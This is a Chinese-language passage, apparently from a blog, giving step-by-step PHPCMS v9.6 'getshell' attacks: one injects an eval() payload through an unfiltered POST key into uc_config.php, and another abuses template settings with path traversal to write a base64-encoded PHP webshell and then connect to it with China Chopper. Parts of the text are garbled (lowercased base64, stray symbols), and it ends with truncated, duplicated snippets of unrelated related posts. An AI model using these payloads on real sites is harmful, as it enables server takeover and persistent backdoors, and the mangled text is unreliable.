v9.6管理員許可權getshell:
);}其中$data = isset($_post['data']) ? $_post['data'] : '';
和foreach ($data as $k => $v)
這裡可以看到用post方式傳遞data中key,value並寫入/phpsso_server/caches/configs/uc_config.php中
在rootdir/phpcms/libs/classes/param.class.php中
public function __construct()
全域性過濾post 但這裡之過濾value 沒過濾key
接下來看步驟
**貼出來:*/eval($_request['a']);//
name="data[uc_api','11');/*]"
phpcmsv9.6低許可權提權(其他版本自測)
新增模板
<?php
file_put_contents('0
.php',base64_decode('pd9wahagqgv2ywwojf9qt1nuwzvdkts/pg==')); ?>
如圖一樣填完直接儲存就ok
然後第二個模板,填完先別儲存
跳到擴充套件設定
在專題模板那裡對著專題首頁右鍵檢視元素後 定位到value='index'
然後替換成上乙個模板的路徑
../../../../html/special/test/index
注意這裡test為你前面的模板名稱
修改完畢後會在根目錄生成乙個0.php//這裡可以在前面那段php**修改 畢竟是寫入
菜刀連線之
PHPCMS V9 注射利用
在用bugscan 白帽子神器 檢測朋友 的時候碰到這個authkey。順便把利用 給大家分享下。本指令碼僅供白帽子安全測試使用,如有用於非法途徑,與作者無關 小白第一次寫東西,大牛勿噴 獲取檢測網域名稱 domain url domain url post url echo 判斷網域名稱是否為空,...
PHPCMS V9 加密規則
phpcms v9 加密規則 加密方式 md5 md5 password encrypt 第一步 對輸入的密碼32位小寫 md5 對輸入的密碼進行trim過濾 第三步 第二步結果密碼32位小寫 md5 例子 密碼 123456 encrypt vcmkn3 如下 a md5 123456 echo ...
PHPCMS V9 加密規則
phpcms v9 加密規則 加密方式 md5 md5 password encrypt 第一步 對輸入的密碼32位小寫 md5 對輸入的密碼進行trim過濾 第三步 第二步結果密碼32位小寫 md5 例子 密碼 123456 encrypt vcmkn3 如下 a md5 123456 echo ...